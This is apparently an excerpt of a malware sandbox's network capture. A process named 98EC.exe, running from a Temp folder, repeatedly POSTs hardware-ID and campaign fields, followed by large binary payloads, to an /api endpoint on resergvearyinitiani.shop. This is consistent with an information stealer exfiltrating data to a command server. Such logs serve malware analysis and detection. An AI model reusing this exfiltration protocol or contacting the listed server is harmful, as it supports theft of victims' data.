2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 70 61 6c 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--pal
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 70 d7 8c 9a c3 01 ac 3e 61 20 c1 34 ae 31 45 63 bd 12 58 b9 14 6f 09 14 77 27 25 c0 38 06 de 8a 31 b5 6f b3 81 98 07 65 7b 84 c0 f9 47 69 0e ee 38 d0 a0 c8 0d 30 43 c7 4a 3c 77 28 81 14 d4 60 aa 04 bf 48 8b e6 bb f9 29 39 3c ee 8b 29 4b a4 43 96 ee c8 85 62 86 19 09 2f 7e 4d a8 f1 26 b5 e3 a9 15 47 e5 35 07 e1 6d dd 45 c0 c6 95 37 55 54 8c 29 38 83 61 53 10 4c e0 ef a2 c8 a9 75 14 e5 92 56 14 ab 38 ef d3 bd 82 d5 85 c9 24 5a 1b 8a 2a b8 21 bb d2 19 08 1b 4a e4 3d 09 37 c6 c2 3e 73 d0 da 56 e6 bc c9 43 cb 90 22 45 3b 88 3c 56 5b fd f5 d1 57 de 98 a9 5b 4a c5 a3 18 7f fb c6 a4 c8 a3 e1 8c 3e dc f1 dd 34 54 62 d1 e9 af 5f 33 77 2a e4 af c3 5a 93 99 2c eb 6a da 46 4e 29 c4 6b f7 22 f4 58 ae e9 39 3f fa 64 b0 a0 ba 3c 16 9a bc db 9e fb a8 dd a9 c6 a4 05 bc 40 Data Ascii: p>a 41EcXow'%81oe{Gi80CJ<w(`H)9<)KCb/~M&G5mE7UT)8aSLuV8$Z!J=7>sVC"E;<V[W[J>4Tb_3wZ,jFN)k"X9?d<@
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 03 4f 6a 12 bc e2 16 ac 55 2b 90 86 15 a2 6c f6 fc 68 ac 01 9a 84 5a 7b 5a d8 34 aa b0 5a 2d e5 a6 ca 34 9e 50 aa 0b 9a 42 d5 95 96 6d e9 cf 27 e4 50 3c 89 bb d4 0a e3 2a 0d 25 48 1c fa 57 73 92 27 2e a7 14 2b d3 f1 20 b4 ad 34 73 89 4f 4f fb 33 2b 93 a9 81 c3 48 71 4f dd e5 ef 7a da d2 ac 18 06 07 fa cc f7 f6 86 4e cf 9e 8e 49 67 7f d0 06 02 d0 d4 b6 8e 5f 09 28 52 f3 b3 aa be 8d 26 39 e4 3d b5 dd 22 1d 0d e9 5c 6f f8 53 14 55 f3 bf 0b ad 5f 55 eb 42 76 73 46 53 90 88 79 ac 1e 35 7e 09 58 df a1 12 66 09 cb b2 3f 8b 48 a7 9c 1d 66 95 46 54 52 6d a9 59 70 c2 f0 1d d6 3d 2f 9a 3a aa da 24 da f7 8a f7 16 61 fc 12 22 b8 40 bf 5c c4 b6 c5 b3 59 6e aa 55 57 d8 16 4c d3 9a 2a 01 f9 ee ab 28 f3 12 7c b7 b2 33 d2 20 a7 7f 3d 8d 4d 53 bf b3 75 4b 79 00 fe ec 3f 4f Data Ascii: OjU+lhZ{Z4Z-4PBm'P<%HWs'.+ 4sOO3+HqOzNIg_(R&9="\oSU_UBvsFSy5~Xf?HfFTRmYp=/:$a"@\YnUWL(\|3 =MSuKy?O
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: d8 b6 7a ae 87 9e 99 3e 50 87 2f 28 11 5c 96 03 f1 bf 95 bd d1 17 40 23 bd 58 0e d3 9d 02 e9 24 1c f5 e7 df ac a7 3f a0 9a 05 7a 2c ab 65 a6 d7 52 4a fe 1c 1c e9 ce be 0d 5c 93 7d a0 3c f5 9b 73 f5 9d 2d 86 da 86 91 42 99 f7 4d b8 4f fc 4e 4c 69 35 51 ff 9a 33 2d 5f 4d eb c7 c6 48 5f de 30 d0 07 6a 88 c8 c5 fb 44 ef bc 00 a3 23 58 a7 ec ce da 72 ed ee 38 ed 81 f8 35 b7 96 ea 2f 71 e8 57 fa c2 62 e9 bb e5 cf 2a 42 3f f5 38 01 df 5b 4f 8e a3 a3 ae 8e 94 c8 c3 0f eb 47 49 c1 46 4d bc e6 c4 8a 57 cb 06 9b a5 63 24 9b 8d 86 af 06 6f 8d f6 a4 86 4e c4 27 51 24 41 cb f3 f0 a9 7e fb fd 21 87 2b c7 26 ea b6 56 fc 88 09 58 d6 8a f6 45 f3 96 03 46 7e 9d 46 79 bf 9c 9d 76 16 91 e6 49 57 f7 8f f1 72 97 12 c6 14 0b a5 03 75 b8 23 57 03 66 b4 78 e3 8f 76 de 58 3a 39 80 Data Ascii: z>P/(\@#X$?z,eRJ\}<s-BMONLi5Q3-_MH_0jD#Xr85/qWb*B?8[OGIFMWc$oN'Q$A~!+&VXEF~FyvIWru#WfxvX:9
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 35 d5 47 98 06 ad 5b 09 68 ab 4c a7 b4 ad 78 7a d0 86 b9 20 c7 73 a7 d5 e8 53 13 fd fa 10 dd 3a e2 17 34 ec 7b 3e a3 84 77 75 fb 27 ff 93 f2 41 3e 4f f8 b3 3d 90 c5 8d 81 f3 f6 60 0a 37 ce e8 34 ae d1 54 31 4a e0 39 42 dc 60 1f 05 32 59 e1 63 94 13 8a aa 07 d9 6d d6 f4 e4 b7 08 7c 54 18 a9 86 fd f6 a0 32 2b e2 0f 50 e7 dc 8e d8 2a d1 f0 e0 3a a6 c7 2c c8 e7 b1 a2 80 a1 fb 71 1b 63 9a 6b 57 ba 44 58 c4 18 fe b5 4b c2 37 da 9c c8 be 28 d8 09 0f f6 8d 0a 7c e5 16 7a 71 dd 3b ba 5b d8 6e f7 f8 2d 9b d4 04 0e 2d fd 2a ce 0c 80 25 48 53 7a 55 35 67 e2 ad 22 7a 50 46 d3 7c 2a e8 b0 fb a4 e9 a7 dc 10 e1 1b 7c 7d c1 fc eb 13 53 ed d2 70 cf 88 fe 85 4d e8 d6 ae 8c fa 68 1c 40 34 3e 7b 74 50 c0 75 af 31 e7 c2 3b 68 f0 e6 f6 b3 46 02 18 a8 76 1a b6 d5 a0 e3 44 37 5f Data Ascii: 5G[hLxz sS:4{>wu'A>O=`74T1J9B`2Ycm\|T2+P:,qckWDXK7(\|zq;[n--%HSzU5g"zPF\|*\|}SpMh@4>{tPu1;hFvD7_
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 76 35 11 c5 3a 2c 48 29 67 81 bd 12 de 46 04 39 6d 05 86 9a 7f e0 b5 fa cc a6 20 21 70 0d 7c fe 3e 40 5b d4 f0 65 07 5a 66 3d 85 72 f7 6b 46 3d 09 01 af 02 13 86 a9 a1 9b 46 4c 70 a9 30 fb 52 c3 d2 c3 5a 42 fe 2b 86 00 be e3 37 62 5a 74 00 6e b1 64 b9 41 94 c6 18 a8 80 66 24 5b 1f e2 90 9b 9d 1b b1 27 9c e1 18 09 0a 3f a1 f3 b3 cb 9a 56 9e b1 9a 75 56 16 7f 5a 34 ff b2 e3 f0 89 4c 1e a3 90 13 84 90 56 2d c4 c3 49 f4 aa c4 8d 40 2c 8f e1 c9 43 57 c4 e4 ae 47 a4 8a b9 4c d4 57 7d 5c db c5 4e ab e7 98 39 6f bf 91 4f 0a ee d9 22 fd fd 74 63 3f af a6 77 54 e0 4a cf 5a 7d d5 0e 68 3f 56 a4 c8 d5 f9 84 a2 b5 94 f8 de 41 51 c0 6b 0d cd 17 ef 34 2f 46 31 d3 93 95 a1 b9 41 93 d6 c2 e1 b9 ff 24 2a d6 db f0 47 54 ff ce 3b 26 ce 33 a9 86 15 d2 d0 ea a8 e0 f7 8a 51 b1 Data Ascii: v5:,H)gF9m !p\|>@[eZf=rkF=FLp0RZB+7bZtndAf$['?VuVZ4LV-I@,CWGLW}\N9oO"tc?wTJZ}h?VAQk4/F1A$*GT;&3Q
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 79 c8 25 8a 29 2b f6 09 07 f2 2e 98 cb d3 69 01 9e 00 51 b3 f2 c5 98 a2 09 95 c6 47 9a 17 41 a8 e2 77 b5 7e 9b 19 ba 5d 12 b9 8a 74 a6 04 48 4c 45 e7 d2 2e f3 90 cb fb e2 64 8f 82 a4 e5 47 49 66 d7 a9 e5 07 9b 78 8e af 17 ab 82 eb ff 61 be 98 7f 1f 08 0f 88 39 d1 b9 80 06 d2 53 8b 82 0c 41 d4 bd 6f f5 ba 43 83 ae 32 c1 72 56 b9 34 a5 f6 85 1c 23 39 dc d1 95 5d 2f 2e ca eb 6d 31 06 2c 08 de 13 48 fe 28 20 b8 7b 18 44 a5 07 b0 bf 4d a7 f5 0d 1f d8 db 4d 3c d5 82 05 78 c6 4f b1 5a e6 e7 14 98 dd 56 ed 3a 5d fe 65 bb 42 0d 74 ae ea b4 8d 75 e8 03 cb 63 c2 c0 66 6b f4 d2 fb 1a 02 92 5e a9 89 a0 99 e9 6e ac c3 6b ef 05 c0 ef 74 be 5b 00 74 d4 8e 2f 92 2d 0c c2 9c ba 21 46 1d 71 7f 30 ad e1 7f 5c 0f cf b9 69 29 f7 ca f4 3f f7 26 06 5f 95 c0 f7 ff e4 4a 0d 54 ee Data Ascii: y%)+.iQGAw~]tHLE.dGIfxa9SAoC2rV4#9]/.m1,H( {DMM<xOZV:]eBtucfk^nkt[t/-!Fq0\i)?&_JT
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: 61 ac f3 2e 70 06 93 0d a7 64 6c 5b 32 a5 8e 56 ba ba 4a ff a5 26 96 63 6b 33 1a 89 03 08 e6 df 5b b3 d2 fc 24 70 88 43 31 ee 5e bf 76 ce b6 24 70 fb f9 61 6d 63 f5 d5 ed 2b 98 11 89 27 07 58 d2 a2 5d fc 80 67 5b 5a c0 42 48 fa 15 a0 0d 22 4c d3 31 14 d5 52 97 96 08 01 b8 2e f7 05 b0 51 69 d4 e3 1e 03 a9 75 ab 45 7b b0 d8 d2 ef 29 65 40 86 f7 fe f6 d1 05 01 9c e8 b8 dc 08 6c d6 0c f7 73 66 0d b1 7e 58 28 35 cc 4f 98 9d 55 cd ed dd 6d 05 b0 b0 9f 4f 89 0a 19 e1 24 65 78 82 bf e1 76 15 9e 6a 33 51 bf 0f e4 2f bb 06 2e 9c 03 f9 b4 64 42 d2 29 6a 44 e2 82 69 2b bd cf 25 7f 15 a6 42 38 54 ea f2 e2 ec 6e 39 49 f8 6c 64 97 cc eb 6f 4a 92 62 05 13 5d 70 93 d6 10 09 4e a3 68 bc 4a 3f 0b fb 9a 3f 3a 93 bb 67 6a 0e 59 f8 c8 c7 84 9f 9c 68 d3 65 04 4b 82 02 a7 ee 28 Data Ascii: a.pdl[2VJ&ck3[$pC1^v$pamc+'X]g[ZBH"L1R.QiuE{)e@lsf~X(5OUmO$exvj3Q/.dB)jDi+%B8Tn9IldoJb]pNhJ??:gjYheK(
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: b6 b4 69 67 a7 c0 5a 4a 8d c0 e7 b7 51 35 23 e4 3e 8f 95 1f 3e bf 1b d8 9e ff 3d 52 58 01 5a b0 a1 7b 30 aa 6f a8 63 5f 87 7e 50 3e ff b1 a2 40 a2 93 d1 92 b4 f8 05 e6 1f be fb f2 ab 09 3a 88 4a 49 71 26 eb 20 6f 6c 39 a5 41 66 0a 23 e2 bc 5c b1 b3 76 45 5e 3f a0 af e6 ea fa 6c a1 8b f4 7e b3 df 71 b4 76 a7 5c cc aa 76 27 7e 24 f5 fb 2b e1 87 1e cd 9a 55 a6 46 05 fb 5d 52 fa 77 7b 47 ef 91 05 fd 37 ce fc ee cf cc b9 8f 60 ea 5a f0 59 dd 3d 40 cb ce a8 1f aa ab d6 c2 5d c6 23 6d 97 92 76 13 5f 9e 67 02 a8 8e f2 bb 54 7f 9b 6c fb 6d 0c 92 f1 fb 29 4c b2 dc 85 2d ad 0b 8d 06 b5 77 44 bf d4 b2 0e bb 30 1c 39 1f 70 dc 71 99 28 32 44 b1 ba 43 51 03 be 02 fc 71 18 39 2b e4 03 8f 41 af fb 71 dd 90 51 b7 d0 54 35 88 79 0e bf e7 42 c3 dd 67 63 71 d1 b3 34 a9 3d 67 Data Ascii: igZJQ5#>>=RXZ{0oc_~P>@:JIq& ol9Af#\vE^?l~qv\v'~$+UF]Rw{G7`ZY=@]#mv_gTlm)L-wD09pq(2DCQq9+AqQT5yBgcq4=g
2024-02-20 23:22:54 UTC	15331	OUT	Data Raw: db ba b2 4e ce 75 00 bf 15 ea 79 bd 67 75 9a 00 44 39 0f c8 f4 de 8d 60 c4 aa e0 22 6a dc 5b 55 fc f6 b7 7e a9 c7 d7 20 3e 8c f8 15 c1 b9 d6 2f 71 e6 0f ab 65 c7 30 5d 63 3e 4d 63 68 c5 9d 56 93 38 e3 e8 5a c2 b6 48 ad 8e b5 c2 03 df 05 6e 25 d6 2e 76 a1 7e 7e c1 b2 4f cc 69 e8 b8 53 31 48 f8 a7 4f 8d 53 db ca bf c3 ff bd dc db cc 10 f4 7d 04 ed 33 18 8a f2 9c 46 29 f7 a8 62 95 07 b9 0d 41 9e de e0 09 ea 3d a8 d8 26 99 48 53 57 5a 35 e0 01 f0 a7 41 c0 76 c8 45 79 7e f0 1d 3b 61 53 94 f3 d3 6f d5 f3 f4 bd 0b 24 fa 60 db ae d6 fb 08 f2 6d 94 d7 fe d2 57 c7 b4 31 f0 65 b4 35 44 56 f9 88 1a 3f ee 12 c8 7d fb cd dd 56 8a 56 3c 61 2a 48 de c2 d9 da 6c c2 53 10 13 98 55 0c 21 c1 8b f7 27 9b c3 8f cf 8d a4 88 50 02 21 13 a7 c2 67 6f 94 30 b0 76 7c a7 50 63 ae c6 Data Ascii: NuyguD9`"j[U~ >/qe0]c>MchV8ZHn%.v~~OiS1HOS}3F)bA=&HSWZ5AvEy~;aSo$`mW1e5DV?}VV<a*HlSU!'P!go0v\|Pc
2024-02-20 23:22:55 UTC	824	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mbcm8j8auqo9badf5av28dtr7e; expires=Sat, 15-Jun-2024 17:09:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uI9sCoNFn4PBGVHrOXyOWAdf4%2F0vy%2F%2BqeWNh7AaDvdWzM9d4xzBXb%2BTyQUctN0qL%2BLq%2B%2BajVJIED08ExozEFPPt4TSwstrlgLUegVVqtGGYrKGv5mtmErgKu7NTL92jlGEuenpekz%2FwI7frG86g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e89ab5c43df-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49737	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:57 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5453 Host: resergvearyinitiani.shop
2024-02-20 23:22:57 UTC	5453	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:22:57 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2kr0o1786husursa2eg7vf6hu6; expires=Sat, 15-Jun-2024 17:09:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0rNOEdECYNYLIMXYXojljutFB0mEOrwGz0alawjKO5V9yHeP%2Bl1Xktg6frtj1j6upFlh3fPXyrTc99c1JypRytaS3BewDYSd9rSGsNAlkQ4jwDXoY4mvZBLGnROK1lu5hndjIxUng8mkeE0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e9ccc851801-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:57 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49738	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:58 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1369 Host: resergvearyinitiani.shop
2024-02-20 23:22:58 UTC	1369	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:22:58 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8s2j5g1hnm86panemf76ssrodo; expires=Sat, 15-Jun-2024 17:09:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BsxoOyac8raq2LH1DjZ0h2AYWdw1bnaLj4yNNzpGRLkS7nT6J5tAwYIwwzc4oIslEcgxCE32OyvctMSui0mOGttItB5NSpArXDalXmMR8hbfM%2BbQ%2FJsu9fu2ZqtApWW2Wa9GzIfJ9obAUdg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7ea30b7f43ee-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:58 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0d 0a Data Ascii: 11ok 191.96.227.222
2024-02-20 23:22:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49739	104.21.94.2	443	6260	C:\Users\user\AppData\Local\Temp\98EC.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:23:00 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 428413 Host: resergvearyinitiani.shop
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 30 42 39 35 41 32 39 36 42 36 46 35 35 35 32 42 41 43 33 46 43 35 33 32 42 46 43 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6880B95A296B6F5552BAC3FC532BFCFF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 89 81 ff 8a e9 bf cb 38 a0 17 b6 82 59 1c b8 6b 46 cd e1 00 56 9f 30 90 60 1a d7 98 a2 b1 5e 09 ac 5c 8a b7 04 8a bb 93 12 60 1c 03 6f c5 98 da b7 d9 40 cc 83 b2 3d 42 e0 fc a3 34 07 77 1c 68 50 e4 06 98 a1 63 25 9e 3b 94 40 0a 6a 30 55 82 5f a4 45 f3 dd fc 94 1c 1e f7 c5 94 25 d2 21 4b 77 e4 42 31 c3 8c 84 17 bf 26 d4 78 93 da f1 d4 8a a3 f2 9a 83 f0 b6 ee 22 60 e3 ca 9b 2a 2a c6 14 9c c1 b0 29 08 26 f0 77 51 e4 d4 3a 8a 72 49 2b 8a 55 9c f7 e9 5e c1 ea c2 64 12 ad 0d 45 15 dc 90 5d e9 0c 84 0d 25 f2 9e 84 1b 63 61 9f 39 68 6d 2b 73 de e4 a1 65 48 91 a2 1d 44 1e ab ad fe fa e8 2b 6f cc d4 2d a5 e2 51 8c bf 7d 63 52 e4 d1 70 46 1f ee f8 6e 1a 2a b1 e8 f4 d7 af 99 3b 15 f2 d7 61 ad c9 4c 96 75 35 6d 23 a7 14 e2 b5 7b 11 7a 2c d7 f4 9c 1f 7d 32 58 50 5d 1e Data Ascii: 8YkFV0`^\`o@=B4whPc%;@j0U_E%!KwB1&x"`*)&wQ:rI+U^dE]%ca9hm+seHD+o-Q}cRpFn;aLu5m#{z,}2XP]
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: ad b1 d4 98 49 b2 c2 af 2c 12 16 9d 8e c2 81 27 35 09 5e 71 0b d6 aa 15 48 c3 0a 51 36 7b 7e 34 d6 00 4d 42 ad 3d 2d 6c 1a 55 58 ad 96 72 53 65 1a 4f 28 d5 05 4d a1 ea 4a cb b6 f4 e7 13 72 28 9e c4 5d 6a 85 71 95 86 12 24 0e fd ab 39 c9 13 97 53 8a 95 e9 78 10 da 56 9a b9 c4 a7 a7 fd 99 95 c9 d4 c0 61 a4 b8 a7 ee f2 77 3d 6d 69 56 0c 83 03 7d e6 7b 7b 43 a7 67 4f c7 a4 b3 3f 68 03 01 68 6a 5b c7 af 04 14 a9 f9 59 55 df 46 93 1c f2 9e da 6e 91 8e 86 74 ae 37 fc 29 8a aa f9 df 85 d6 af aa 75 21 bb 39 a3 29 48 c4 3c 56 8f 1a bf 04 ac ef 50 09 b3 84 65 d9 9f 45 a4 53 ce 0e b3 4a 23 2a a9 b6 d4 2c 38 61 f8 0e eb 9e 17 4d 1d 55 6d 12 ed 7b c5 7b 8b 30 7e 09 11 5c a0 5f 2e 62 db e2 d9 2c 37 d5 aa 2b 6c 0b a6 69 4d 95 80 7c f7 55 94 79 09 be 5b d9 19 69 90 d3 bf Data Ascii: I,'5^qHQ6{~4MB=-lUXrSeO(MJr(]jq$9SxVaw=miV}{{CgO?hhj[YUFnt7)u!9)H<VPeESJ#*,8aMUm{{0~\_.b,7+liM\|Uy[i
2024-02-20 23:23:00 UTC	15331	OUT	Data Raw: 82 73 ce aa bd 43 55 1f 8c 7b 50 1f 17 0e 6c 5b 3d d7 43 cf 4c 1f a8 c3 17 94 08 2e cb 81 f8 df ca de e8 0b a0 91 5e 2c 87 e9 4e 81 74 12 8e fa f3 6f d6 d3 1f 50 cd 02 3d 96 d5 32 d3 6b 29 25 7f 0e 8e 74 67 df 06 ae c9 3e 50 9e fa cd b9 fa ce 16 43 6d c3 48 a1 cc fb 26 dc 27 7e 27 a6 b4 9a a8 7f cd 99 96 af a6 f5 63 63 a4 2f 6f 18 e8 03 35 44 e4 e2 7d a2 77 5e 80 d1 11 ac 53 76 67 6d b9 76 77 9c f6 40 fc 9a 5b 4b f5 97 38 f4 2b 7d 61 b1 f4 dd f2 67 15 a1 9f 7a 9c 80 ef ad 27 c7 d1 51 57 47 4a e4 e1 87 f5 a3 a4 60 a3 26 5e 73 62 c5 ab 65 83 cd d2 31 92 cd 46 c3 57 83 b7 46 7b 52 43 27 e2 93 28 92 a0 e5 79 f8 54 bf fd fe 90 c3 95 63 13 75 5b 2b 7e c4 04 2c 6b 45 fb a2 79 cb 01 23 bf 4e a3 bc 5f ce 4e 3b 8b 48 f3 a4 ab fb c7 78 b9 4b 09 63 8a 85 d2 81 3a dc Data Ascii: sCU{Pl[=CL.^,NtoP=2k)%tg>PCmH&'~'cc/o5D}w^Svgmvw@[K8+}agz'QWGJ`&^sbe1FWF{RC'(yTcu[+~,kEy#N_N;HxKc:
